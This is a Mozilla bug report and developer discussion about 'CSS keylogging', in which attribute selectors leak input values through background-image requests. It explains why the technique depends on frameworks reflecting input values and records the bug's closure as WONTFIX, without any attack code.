Closed Bug 1440786 Opened 7 years ago Closed 5 years ago

Prevent CSS keylogging

Categories

(Core :: CSS Parsing and Computation, enhancement, P5)

Product:
Core
Component:
CSS Parsing and Computation
Type:
enhancement

Tracking

()

Status:
RESOLVED WONTFIX

People

(Reporter: andre.jaenisch, Unassigned)

References

Details

User Agent: Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0 Build ID: 20180203232545 Steps to reproduce: Trying https://github.com/maxchehab/CSS-Keylogging makes me feel uncomfortable. Talking to the community I've learned about - https://vimeo.com/100264064 - https://xss-game.appspot.com - https://github.com/tlrobinson/evil.css/ so it is known, but I couldn't find a ticket here (too much noise on "background" search term). Actual results: Requests to an express server are logged as people are entering data into an input. Expected results: In order to not breaking existing behaviour I would expect to log a console.warn on the developer tools whenever there is a request using a CSS background-image on the value attribute of an input. If it turns out to not break apps, but is malicious only, it should be blocked altogether.
Severity: normal → enhancement
Component: Untriaged → Tracking Protection
Flagging the triage owner on this one in case there's already work going on to mitigate this.
Flags: needinfo?(francois)
Dan, any idea what component we should put bugs like that in? It doesn't have anything to do with the Disconnect-based tracking protection feature in Firefox.
Flags: needinfo?(francois) → needinfo?(dveditz)
this would require a spec-violating change to CSS. Note that CSS cannot actually respond to the content of an input -- this was seen as a potential security problem. What it can do is respond to the value _attribute_ which normally is static content served by the site. Unfortunately some javascript frameworks think it's a great idea to reflect the dynamic contents of an input back into the value attribute. This trick only works if a site uses one of these frameworks which are doing something that the CSS committee rejected as unsafe. What do you know: turns out it's unsafe. The readme of that extension says the first step is "Open a website that uses a controlled component framework such as React." Or in other words, if the site itself has installed a keylogger (React acts like a keylogger in order to reflect the content back into the value attribute) _then_ you can use CSS to detect that keylogging. I suspect this is WONTFIX. David?
Component: Tracking Protection → CSS Parsing and Computation
Flags: needinfo?(dveditz) → needinfo?(dbaron)
Product: Firefox → Core
I guess wontfix is reasonable. That said, CSS features have been proposed that *would* allow selecting on the value of an input, and I don't recall them being rejected for security reasons. It's a thing that has legitimate use cases. I tend to think it's bad to assume that a malicious CSS author whose CSS is part of your site can't learn about the contents of your site.
Flags: needinfo?(dbaron)
:dveditz:, :dbaron: Okay, so it would violatea CSS spec … I've heard that W3C moved to GitHub. And indeed, I can see WG repositories there. However, I am feeling a bit lost, where to look for in https://github.com/w3c/csswg-drafts If you could lend me a hand here, I am asking the WG's members for their opinion on that. Won't Fix is a valid answer (albeit not making me too happy).
Flags: needinfo?(dveditz)
Flags: needinfo?(dbaron)
You're interested in the selectors spec, the latest draft for the relevant bits is https://drafts.csswg.org/selectors-4/#attribute-representation The current issues are https://github.com/w3c/csswg-drafts/issues?utf8=%E2%9C%93&q=is%3Aissue+is%3Aopen+selectors+in%3Atitle You could also raise this on their mailing list. I'm not involved in the group so I don't know whether a github issue or mailing list discussion is better. I recommend skimming the recent mail archives to get the tenor of the group. https://lists.w3.org/Archives/Public/www-style/
Flags: needinfo?(dveditz)
further in the spec is https://drafts.csswg.org/selectors-4/#input-pseudos which is also relevant.
Third party CSS isn't safe. Browsers/specs shouldn't pretend it is by patching individual cases like this. I've outlined a few ways third party CSS can hurt you https://jakearchibald.com/2018/third-party-css-is-not-safe/.
P5 until something actionable comes out of the linked CSSWG issue.
Priority: -- → P5

The CSSWG just discussed this and agreed to close WONTFIX.

Status: UNCONFIRMED → RESOLVED
Closed: 5 years ago
Resolution: --- → WONTFIX
You need to log in before you can comment on or make changes to this bug.